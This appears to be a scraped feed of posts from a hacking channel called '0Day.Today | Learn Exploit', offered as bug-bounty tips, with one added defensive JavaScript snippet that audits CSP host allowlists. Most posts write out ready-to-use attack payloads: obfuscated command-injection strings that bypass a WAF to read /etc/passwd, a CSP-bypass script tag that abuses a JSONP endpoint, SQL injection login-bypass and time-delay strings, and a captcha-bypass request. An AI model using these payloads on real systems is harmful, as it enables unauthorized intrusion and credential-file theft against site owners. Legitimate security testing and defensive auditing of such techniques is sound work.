0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

Advertisements: @LearnExploitAds

IR0Day.Today
Top 25 Local File Inclusion (LFI) Parameters

#bugbounty #ethicalhacking
——————
0Day.Today
@LearnExploit
@Tech_Army
Ways to bypass JSON Web Token controls

#bugbounty
——————
RCE Parameters For newbie Bug Bounty Hunters

#bugbounty
——————‌
Not only crawling but you can do Subdomain Enumeration using Wayback.

curl --insecure --silent "http://web.archive.org/cdx/search/cdx…" | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sed "/@/d" | sed -e 's/\.$//' | sort -u

#bugbounty
——————
Bypassing Rate Limit Protection

Github

#bypass #bugbounty
——————
Bypass Captcha (Google reCAPTCHA)

1. Try changing the request method, for example POST to GET
POST / HTTP/1.1
Host: target.com
...

_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123

#bugbounty #bypass
——————
RCE WAF Bypass

;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?

#bugbounty #RCE #bypass
——————
Payload Injector:

Debinject:
😸 GitHub

Pixload:
😸 GitHub

Gospider:
😸 GitHub

#Injection #Hacking_Tool #BugBounty

BugCod3

——————
You can bypass CSP on any website that allows http://microsoft.com in a script-src

PoC:
<script src=http://microsoft.com/en-us/research/wp-json?_jsonp=alert></script>

This works because of the WordPress CSP bypass our engineer (octagon) found last year:

octagon.net

#BugBounty #bypass #POC
——————‌
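
Added example (not part of the original post): a defender-side check that flags the weakness the CSP post above relies on, namely host-based allowlists in script-src that are not neutralized by 'strict-dynamic'. The function names and the sample policies are constructed for illustration.

```javascript
// Audit a Content-Security-Policy header value for host-based script
// allowlists. Any allowlisted host that serves a JSONP-style endpoint
// becomes a script source, so such entries deserve review.

// Parse a CSP header value into a map of directive -> source list.
function parseCsp(header) {
  const policy = Object.create(null);
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // The first occurrence of a directive wins; later duplicates are ignored.
    if (!(name in policy)) policy[name] = tokens.slice(1);
  }
  return policy;
}

// Return the host and scheme sources that may load <script src=...>.
function riskyScriptSources(header) {
  const policy = parseCsp(header);
  // Fallback chain browsers use for script elements.
  const sources = policy['script-src-elem'] || policy['script-src'] ||
                  policy['default-src'];
  if (!sources) return { enforced: false, hosts: [] };
  const lower = sources.map((s) => s.toLowerCase());
  // With 'strict-dynamic', CSP3 browsers ignore host and scheme sources.
  if (lower.includes("'strict-dynamic'")) return { enforced: true, hosts: [] };
  // Keywords, nonces and hashes are quoted; the rest are hosts or schemes.
  // A nonce alone does not help: a script matching a listed host still loads.
  return { enforced: true, hosts: sources.filter((s) => !s.startsWith("'")) };
}

// Constructed sample policies.
const SAMPLE_ALLOWLIST =
  "default-src 'self'; script-src 'self' https://microsoft.com https://cdn.example";
const SAMPLE_STRICT =
  "script-src 'nonce-r4nd0m' 'strict-dynamic' https://microsoft.com; object-src 'none'";
const SAMPLE_NO_SCRIPT_POLICY = "img-src *";

for (const p of [SAMPLE_ALLOWLIST, SAMPLE_STRICT, SAMPLE_NO_SCRIPT_POLICY]) {
  const r = riskyScriptSources(p);
  const verdict = !r.enforced ? 'no script policy'
    : r.hosts.length ? 'review hosts: ' + r.hosts.join(', ')
    : 'no host allowlist in effect';
  console.log(verdict + '  <=  ' + p);
}
```

Moving to nonces or hashes together with 'strict-dynamic' removes the dependency on every allowlisted host being free of script-returning endpoints.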
Another #SQLi found! This time Microsoft SQL Server database vulnerable to stacked queries.

Payload ' or 1=1 -- - bypassed the login site, and then confirmed injection point with ';WAITFOR DELAY '0:0:5'-- executing a 5s delay

#VPD #BugBounty #security
